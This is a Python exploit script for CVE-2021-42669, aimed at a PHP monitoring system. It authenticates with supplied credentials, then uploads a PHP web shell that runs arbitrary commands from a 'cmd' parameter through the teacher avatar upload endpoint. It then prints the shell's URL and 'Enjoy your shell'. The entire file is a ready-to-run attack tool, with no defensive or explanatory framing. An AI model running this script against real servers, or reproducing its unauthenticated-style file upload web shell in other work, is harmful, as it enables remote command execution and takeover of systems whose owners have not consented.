import requests
import sys


def auth(target_ip, target_port, uri_path, username, password):
    url = f'http://{target_ip}{uri_path}login.php'
    session = requests.get(url)
    cookies = (f"PHPSESSID={session.cookies['PHPSESSID']}")

    header = {
        'Host': target_ip,
        'Origin': 'http://' + target_ip,
        'Referer': 'http://' + target_ip + uri_path,
        'Cookie': cookies
    }

    data_body = {
        'username': username,
        'password': password,
    }

    url_auth = f'http://{target_ip}:{target_port}{uri_path}login.php'
    authentication = requests.post(url_auth, headers=header, data=data_body)

    if 'false' in authentication.text:
        print('[-] Username or password are incorrect, Try again')
        exit()
    else:
        print('[+] Authentication completed successfully, uploading the webshell\n')
    
    return cookies

def exploit(target_ip, target_port, uri_path, cookies):
    header = {
        'Host': target_ip,
        'Content-Type': 'multipart/form-data; boundary=---------------------------264114505815036787051551062848',
        'Content-Length': '375',
        'Origin': 'http://' + target_ip,
        'Connection': 'close',
        'Referer': 'http://' + target_ip + uri_path + 'dasboard_teacher.php',
        'Cookie': cookies,
        'Upgrade-Insecure-Requests': '1'
    }


    data_body = '-----------------------------264114505815036787051551062848\r\nContent-Disposition: form-data; name="image"; filename="webshell.php"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET["cmd"]); ?>\n\r\n-----------------------------264114505815036787051551062848\r\nContent-Disposition: form-data; name="change"\r\n\r\n-----------------------------264114505815036787051551062848--\r\n'

    upload_url = f'http://{target_ip}:{target_port}{uri_path}teacher_avatar.php'
    requests.post(upload_url, headers=header, data=data_body)


def main():
    
    if len(sys.argv) != 6:
        print(
            'Incorrect parameters!\r\n[!] Useage: python CVE-2021-42669.py <target_ip> <target_port> <target_uri> <username> <password>\r\n[!] Example: python CVE-2021-42669.py 127.0.0.1 80 /nia_uoz_monitoring_system/ MyUserName MyPassword')
        exit()
        
    target_ip = sys.argv[1]
    target_port = sys.argv[2]
    uri_path = sys.argv[3]
    username = sys.argv[4]
    password = sys.argv[5]
    
    
    cookies = auth(target_ip, target_port, uri_path, username, password)
    exploit(target_ip, target_port, uri_path, cookies)

    print(
        f'[+] Webshell uploaded successfully to: http://{target_ip}:{target_port}{uri_path}admin/uploads/webshell.php\r\n[+]Enjoy your shell')


if __name__ == '__main__':
    main()